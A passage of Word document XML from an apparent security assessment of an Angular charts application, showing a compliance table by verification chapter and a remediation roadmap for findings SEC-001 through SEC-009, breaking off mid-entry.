          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100% — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Business Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100% — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Files &amp; Resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100% — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API &amp; Web Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100% — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key observations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V4 (Access Control) and V14 (Configuration) show 0% compliance based on assessable requirements — the routing module gap is the primary driver.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V7 (Error Handling &amp; Logging) shows 0% compliance — no logging or monitoring instrumentation is present across any assessed screen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V8, V10, V11, V12, V13 show high compliance but with "Limited Assessment" caveats — the components' minimal nature means few requirements are applicable, not that they are comprehensively implemented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapters V2, V3, and V9 cannot be meaningfully assessed without the routing module, server configuration, and session management documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="39" w:name="Xa3a27f1a5c5d7fff3307af17449baaafdac943d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="35" w:name="X646b9c02b677092cb810ed3f02112b451cf486d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 1: Immediate (0–7 days) — Critical Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Critical findings were identified in this assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="X78b877094cf99f7b0bc360637975b93e396b31f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2: Short-Term (1–4 weeks) — High Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-001">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-001</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Confirm and enforce route guard coverage on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parent route —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 2–4 hours (locate routing module, verify guard, add if missing, write integration test)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-010">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-010</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Audit D3 child components for unsafe DOM manipulation methods and apply</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DomSanitizer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.html()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 1–3 days (depends on number of D3 child components and complexity of visualizations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-011">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-011</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Implement centralized Angular</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ErrorHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with security monitoring integration and CSP violation reporting —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 1–2 days (shared infrastructure work that also resolves SEC-004 and SEC-008)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 Total Effort Estimate:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2–5 days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="Xb29d905c8b94d956404b91b273dabc47cb3f082"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 3: Medium-Term (1–3 months) — Medium Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-002">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-002</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Add wildcard child route under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">redirecting to a 404 page —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 2–4 hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-006">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-006</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Migrate hardcoded Chart.js template data to TypeScript component properties backed by a data service —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 2–5 days (depends on number of charts and whether a data service already exists)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-012">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-012</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Review</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.component.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to confirm production readiness; remove or complete stub if applicable —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 4–8 hours (review) + variable implementation time if stub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 Total Effort Estimate:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3–7 days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="phase-4-backlog--low-and-info-findings"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 4: Backlog — Low and Info Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-003">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-003</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChangeDetectionStrategy.OnPush</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-004">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-004</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Centralized logging (resolved by SEC-011 implementation; verify coverage extends to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">route) —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 1 hour (verification only if SEC-011 is implemented first)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-005">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-005</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Plan NgModule-to-standalone component migration for charts feature module —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 1–2 days (planning); 3–5 days (implementation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-007">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-007</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aria-label</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role="img"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to Chart.js canvas elements; implement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">header —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 4–8 hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-008">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-008</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Logging coverage for Chartjs screen (resolved by SEC-011 implementation; verify coverage) —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 1 hour (verification only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-009">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-009</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
